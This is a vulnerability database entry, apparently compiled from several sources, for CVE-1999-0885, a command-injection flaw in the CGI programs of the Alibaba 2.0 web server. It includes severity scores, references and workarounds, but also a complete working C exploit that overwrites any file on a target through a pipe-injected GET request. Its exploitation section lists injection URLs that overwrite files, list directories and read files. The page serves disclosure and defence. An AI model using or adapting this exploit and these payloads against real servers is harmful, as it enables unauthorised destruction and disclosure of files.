CVE-1999-0885
CVSS 3.6
Published: 1999-11-03 00:00:00
Last revised: 2008-09-09 08:36:07

[Original] Alibaba web server allows remote attackers to execute commands via a pipe character in a malformed URL.


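[CNNVD] Alibaba software multiple CGI vulnerabilities (CNNVD-199911-014)

        
        Alibaba Webserver ships with several CGI programs.
        None of these scripts handles user-supplied input properly, so a remote attacker can exploit these flaws to view, overwrite, create and delete arbitrary files on the server.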
        

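- CVSS (base score)

CVSS score: 3.6 [LOW]
Confidentiality impact: PARTIAL [likely to result in information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]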

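- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found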

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0885
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0885
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-014
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/770
(UNKNOWN)  BID  770
http://www.securityfocus.com/templates/archive.pike?list=1&date=1999-11-01&msg=01BF261F.928821E0.kerb@fnusa.com
(UNKNOWN)  BUGTRAQ  19991103 More Alibaba Web Server problems...

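- Vulnerability information

Alibaba software multiple CGI vulnerabilities
Low risk    Input validation
1999-11-03 00:00:00 2005-10-20 00:00:00
Remote ※ Local
        
        Alibaba Webserver ships with several CGI programs.
        None of these scripts handles user-supplied input properly, so a remote attacker can exploit these flaws to view, overwrite, create and delete arbitrary files on the server.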
        

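- Advisories and patches

        Vendor patch:
        Computer Software Manufaktur
        ----------------------------
        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: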
        
        http://www.csm.co.at/csm/alibaba.htm

- Vulnerability information (19595)

Computer Software Manufaktur Alibaba 2.0 Multiple CGI Vulnerabilities (EDBID:19595)
windows remote
1999-11-03 Verified
0 Kerb
N/A
source: http://www.securityfocus.com/bid/770/info

There are several CGI programs that ship with the Alibaba webserver. Many of these do not do proper input handling, and therefore will allow requests for access to files outside of normal or safe webserver practice. This results in various situations where an attacker can view, overwrite, create and delete files anywhere on the server. 

/*

 Description: DoS against Alibaba 2.0 WebServer by wildcoyote
 Comments   : Based on advisorie by Prizm<Prizm@RESENTMENT.org>
              It is possible to overwrite any file on the remote box!
 Platforms  : Alibaba runs on Win95/98/NT
 Flamez to  : wildcoyote@coders-pt.org

*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>

// If it didnt work, uncomment (JUST ONE) of the following defines...
// (In case of one of them, isn't present...)
#define vulnerable_cgi "/cgi-bin/post32.exe"
// #define vulnerable_cgi "/cgi-bin/post16.exe"
// #define vulnerable_cgi "/cgi-bin/get16.exe"


int 
openhost(char *host,int port) {
   int sock;
   struct sockaddr_in addr;
   struct hostent *he;
      
   he=gethostbyname(host);
   
   if (he==NULL) return -1;
   
   sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
    
   if (sock==-1) return -1;
    
   memcpy(&addr.sin_addr, he->h_addr, he->h_length);
   addr.sin_family=AF_INET;
   addr.sin_port=htons(port);

   if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1;
    
   return sock;
}

void 
sends(int sock,char *buf) {
  write(sock,buf,strlen(buf));
}

void 
overwrite(char *host, char *file, int port)
{
 int sock,i;
 char buf[512];
 printf("\nAlibaba 2.0 WebServer File Overwrite Xploit by wildcoyote\n\n");
 printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
 sock=openhost(host,port);
 if(sock==-1) {
     printf("- Could not connect -\n");
     printf("Exiting...\n\n");
     exit(-1);
 }
 else printf("Connected to %s (%d)\n",host,port);
 sprintf(buf,"GET %s|echo%20>%s\n\n",vulnerable_cgi,file);
 printf("Oh k! Trying to overwrite the file...\n");
 sends(sock,buf);
 close(sock);
 printf("All done, the file was *probably* overwrited ;)\n");
 printf("Send flamez to wildcoyote@coders-pt.org, *Enjoy*...\n\n");
}

main(int argc, char *argv[])
{
 int sock,i;
 if (argc<3) {
    printf("\nAlibaba 2.0 WebServer File Overwrite Xploit by wildcoyote\n\n");
    printf("Sintaxe: %s <host> <path to file to overwrite> [port - default 80]\n",argv[0]);
    printf("Warning: Path to file must be a valid DoS path :)\n");
    printf("Evil Example: %s www.vulnerable.alibaba.com c:\\windows\\win.ini\n",argv[0]);
    printf("Send flamez to wildcoyote@coders-pt.org, *Enjoy*...\n\n");
 }
 else if (argc==3) overwrite(argv[1],argv[2],80);
      else overwrite(argv[1],argv[2],atoi(argv[3]));
}
		

- Vulnerability information

11
Alibaba get32.exe Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Alibaba Web Server contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the get32.exe program not sanitizing user-supplied input. By appending additional commands via a | character, arbitrary commands can be executed under the privileges of the web server.

- Timeline

1999-11-03 1999-11-03
1999-11-03 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Remove the get32.exe program from the web server.

- Related references

- Vulnerability author

- Vulnerability information

Alibaba Multiple CGI Vulnerabilities
Input Validation Error 770
Yes Yes
1999-11-03 12:00:00 2009-07-11 12:56:00
Posted to Bugtraq by Kerb <kerb@fnusa.com> on November 3, 1999.

- Affected software versions

Computer Software Manufaktur Alibaba 2.0
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- Vulnerability discussion

There are several CGI programs that ship with the Alibaba webserver. Many of these do not do proper input handling, and therefore will allow requests for access to files outside of normal or safe webserver practice. This results in various situations where an attacker can view, overwrite, create and delete files anywhere on the server.

- Exploitation

http ://victim.com/cgi-bin/get32.exe|echo%20>c:\file.txt
This will overwrite file.txt, or any file you specify. The get32.exe program will also allow the injection of code bytes into any executable file.

http ://www.victim.com/cgi-bin/alibaba.pl|dir
This will provide a directory listing of the CGI directory.

http ://www.victim.com/cgi-bin/tst.bat|type%20c:\file.txt
This will display the contents of file.txt

- Solution

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

     

     
